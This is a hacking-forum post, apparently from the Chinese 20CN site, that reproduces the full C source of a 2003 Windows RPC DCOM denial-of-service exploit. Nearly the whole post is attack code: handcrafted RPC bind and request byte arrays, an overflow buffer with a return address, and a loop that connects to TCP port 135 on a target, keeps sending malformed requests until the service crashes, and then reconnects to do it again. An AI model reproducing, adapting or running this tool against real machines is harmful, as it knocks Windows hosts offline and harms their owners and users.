论坛: 黑客进阶 标题: WindowsRPCDCOMDoSexploit 复制本贴地址    
作者: allyesno [allyesno]    论坛用户   登录
转至 血色联盟

/*
* Windows RPC DCOM Dos exploit
* by bkbll bkbll@cnhonker.net, 2003/08/07
* http://www.cnhonker.com
* modified the code from oc192 Security
*
* Usage:
* cl dcomdos.cpp
* dcomdos -d 10.10.10.135 -n 3000
*/

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <conio.h>
#include <fcntl.h>
#include <signal.h>

#pragma comment(lib,"ws2_32")

#define VER "2.3_beta"
int num=1;

/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

unsigned char scc[]=
  "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x46\x00\x58\x00"

  "\xff\xff\xff\xff" /* return address */
 
  "\xcc\xe0\xfd\x7f" /* primary thread data block */
  "\xcc\xe0\xfd\x7f"; /* primary thread data block */

  /* bindshell no RPC crash, defineable spawn port */

/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */
int type=0;
struct
{
char *os;
u_long ret;
}
targets[] =
{
// { "[Win2k-Universal]", 0x0018759F },
{ "[Win2k/XP-Universal]", 0x0100139d },
}, v;
char *optarg = NULL;
int  optind = 1;
int  opterr = 1;

#define _next_char(string)  (char)(*(string+1))

int getopt(int argc, char *argv[], char *opstring)
{
  static char *pIndexPosition = NULL;
  char *pArgString = NULL;     
  char *pOptString;             

  if (pIndexPosition != NULL)
    {
      if (*(++pIndexPosition))
        {
          pArgString = pIndexPosition;
      }
  }

  if (pArgString == NULL)
    {
      if (optind >= argc)
        {
          pIndexPosition = NULL;  /* not in the middle of anything */
          return EOF;            /* used up all command-line arguments */
      }
      pArgString = argv[optind++]; /* set this to the next argument ptr */

      if (('/' != *pArgString) && ('-' != *pArgString))
        {
          --optind;              /* point to current arg once we're done */
          optarg = NULL;          /* no argument follows the option */
          pIndexPosition = NULL;  /* not in the middle of anything */
          return EOF;            /* used up all the command-line flags */
      }

      if ((strcmp(pArgString, "-") == 0) || (strcmp(pArgString, "--") == 0))
        {
          optarg = NULL;          /* no argument follows the option */
          pIndexPosition = NULL;  /* not in the middle of anything */
          return EOF;            /* encountered the special flag */
      }

      pArgString++;              /* look past the / or - */
  }

  if (':' == *pArgString)
    {     
      return (opterr ? (int)'?' : (int)':');
  }
  else if ((pOptString = strchr(opstring, *pArgString)) == 0)
    {
      optarg = NULL;              /* no argument follows the option */
      pIndexPosition = NULL;      /* not in the middle of anything */
      return (opterr ? (int)'?' : (int)*pArgString);
  }
  else
    {
      if (':' == _next_char(pOptString))
        {
          if ('\0' != _next_char(pArgString)) optarg = &pArgString[1];
          else
            {
              if (optind < argc) optarg = argv[optind++];
              else
                {
                  optarg = NULL;
                  return (opterr ? (int)'?' : (int)*pArgString);
              }
          }
          pIndexPosition = NULL;  /* not in the middle of anything */
      }
      else
        {
          optarg = NULL;          /* no argument follows the option */
          pIndexPosition = pArgString;    /* point to the letter we're on */
      }
      return (int)*pArgString;    /* return the letter that matched */
  }
}

void usage(char *prog)
{
//int i;
printf("Usage:\n\n");
printf("%s -d <host> [options]\n", prog);
printf("Options:\n");
printf("    -d:        Hostname to attack [Required]\n");
printf("    -p:        Attack port [Default: 135]\n");
printf("    -n:        offset.\n");
exit(0);
}

void sig(int j)
{
    printf("\n[-] Received Ctrl+c\n");
    printf("num=%d\n",num);
    exit(0);
}

int main(int argc, char **argv)
{
  int len, len1, c;
  unsigned short port = 135;
  char buf1[0x1000];
  char buf2[0x1000];
  // unsigned short lportl=666,lports; /* drg */
  //char lport[] = "\x00\xFF\xFF\x8b"; /* drg */

  struct hostent *he;
  struct sockaddr_in their_addr;
  static char *hostname=NULL;
  SOCKET sockfd;
    WSADATA wsd;
    static    char *conbackhost=NULL;
    unsigned short conbackport=0;
    unsigned short conbackportl=0;
  //unsigned long ip;
  unsigned char sc[40000];
    int alllen=0,add90len=0;;
  signal(SIGINT,&sig);

  printf("RPC DCOM DoS exploit(%s) coded by bkbll <bkbll@cnhonker.net>, 2003/08/07\r\nModified from oc192 Security\n",VER);


    if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
  { 
        perror("WSAStartup error");
        exit(0);
    } 
 
  if(argc<2)
  {
    usage(argv[0]);
  }

  while((c = getopt(argc, argv, "d:p:n:"))!= EOF)
  {
          switch (c)
          {
                case 'd':
                      hostname = optarg;
                      break;
                case 'p':
                      port = atoi(optarg);
                      if((port > 65535) || (port < 1))
                      {
                        printf("[-] Select a port between 1-65535\n");
                        return 1;
                      }
                      break;
                case 'n':
                      num = atoi(optarg);
                      break;
                default:
                      usage(argv[0]);
                      return 1;
          }
  }
 
  if(hostname==NULL)
  {
    printf("[-] Please enter a hostname with -d\n");
    exit(1);
  }
  if((conbackport==0) && (conbackhost!=NULL))
    {
        printf("[-] U must give me a port for connecting back\n");
        exit(1);
    }
    if((conbackport>0) && (conbackhost==NULL))
    {
        printf("[-] U must give me a host for connecting back\n");
        exit(1);
    }

  memcpy(scc+36, (unsigned char *) &targets[type].ret, 4);
    printf("[+] Resolving host..");
      fflush(stdout);
  if((he = gethostbyname(hostname)) == NULL)
  {
      printf("Failed\n");
        printf("[-] gethostbyname: Couldnt resolve hostname\n");
    exit(1);
  }

  printf("Done.\n");
  their_addr.sin_family = AF_INET;
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  their_addr.sin_port = htons(port);
AGAIN:
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
  {
      perror("[-] Socket failed");
      return(0);
  }
CONN:
  printf("[+] Connecting to %s:%d.....",hostname,port);
 
    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
  {
      printf("Failed\n");
        perror("[-] Connect failed");
        printf("Crashed,num=%d\n",num);
        printf("[+] waiting server restart\r\n");
        Sleep(8000);
        goto CONN;
      //return(0);
  }
    printf("ok\n");
  while(1)
    {
        memset(sc,0,40000);
        memcpy(sc,scc,sizeof(scc));
        alllen+=sizeof(scc)-1;
        add90len=num;
        memset(sc+alllen,'C',num);
        alllen+=num;
        memcpy(buf2,request1,sizeof(request1));
        len1=sizeof(request1);
 
        *(unsigned long *)(request2)=*(unsigned long *)(request2)+alllen/2; 
        *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+alllen/2;
 
        memcpy(buf2+len1,request2,sizeof(request2));
        len1=len1+sizeof(request2);
        memcpy(buf2+len1,sc,alllen);
        len1=len1+alllen;
        memcpy(buf2+len1,request3,sizeof(request3));
        len1=len1+sizeof(request3);
        memcpy(buf2+len1,request4,sizeof(request4));
        len1=len1+sizeof(request4);
 
        *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+alllen-0xc;
        *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+alllen-0xc; 
        *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+alllen-0xc;
        *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+alllen-0xc;
        *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+alllen-0xc;
        *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+alllen-0xc;
        *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+alllen-0xc;
        *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+alllen-0xc;
        /* end xfocus */
        alllen=0;
        if (send(sockfd,(const char *)bindstr,sizeof(bindstr),0)== SOCKET_ERROR)
        {
            if(WSAGetLastError()!=WSAECONNRESET)
            {
                printf("Target close the socket\r\n");
                closesocket(sockfd);
                goto AGAIN;
            }
            else
            {
                printf("[-] Send failed.........");
                printf("error:%d\r\n",WSAGetLastError());
                break;
            }
        }
        len=recv(sockfd, buf1, 1000, 0);
 
        if (send(sockfd,buf2,len1,0)== SOCKET_ERROR)
        {
            if(WSAGetLastError()!=WSAECONNRESET)
            {
                printf("Target close the socket\r\n");
                closesocket(sockfd);
                goto AGAIN;
            }
            else
            {
                printf("[-] Send failed.....");
                printf("error:%d\r\n",WSAGetLastError());
                printf("crashed,num=%d\r\n",num);
                goto AGAIN;
            }
        }
        num++;
    }
    printf("crashed,num=%d\r\n",num);
    closesocket(sockfd);
    WSACleanup();
  return(0);
}



地主 发表时间: 09/15 14:31

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号